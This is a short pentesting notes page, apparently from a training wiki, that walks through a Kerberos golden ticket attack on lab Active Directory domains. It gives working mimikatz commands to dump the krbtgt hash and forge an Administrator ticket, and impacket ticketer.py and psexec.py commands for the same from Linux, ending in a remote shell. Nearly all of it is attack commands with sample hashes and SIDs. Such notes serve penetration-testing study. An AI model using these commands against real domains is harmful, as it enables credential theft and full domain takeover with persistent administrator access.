Golden Ticket Attacks

Here we have the hash for kerberos ticket granting ticket with which we can gernerate ktgt.

Run mimikatz and privilege::debug
lsadump::lsa /inject /name:krbtgt and copy these 2 into notepad for later use

kerberos::golden /User:Administrator /domain:marvel.local /sid:S-1-5-21-3537832060-1456167142-1983014419 /krbtgt:b72f4a5ed9bef0f6a0ec3d4b5a4e4320 /id:500 /ptt

user can be anything
rid is 500 for admin
ptt means pass the ticket

We can access other computers on network dir \\THEPUNISHER\c$

psexec.exe \\THEPUNISHER cmd.exe to get a shell

Linux

Since we have the krbtgt we can do a golden ticket attack: krbtgt:819af826bb148e603acb0f33d17632f8
We need domain-sid so using powersploit: Powershell:

Get-DomainSID -Domain htb.local

Linux:

lookupsid.py CORP/jen@192.168.203.74

Now using this info with impacket ticketer to get the golden ticket:

ticketer.py -nthash 819af826bb148e603acb0f33d17632f8 -domain-sid S-1-5-21-3072663084-364016917-1341370565 -domain htb.local user

Putting the ticket in our environment variable:

export KRB5CCNAME=DoesNotExist.ccache

Note: before psexec check if dns and time is configured properly

psexec.py -debug htb.local/administrator@forest -k -no-pass

PreviousDCSync NextSilver Ticket Attack

Last updated 6 months ago

Was this helpful?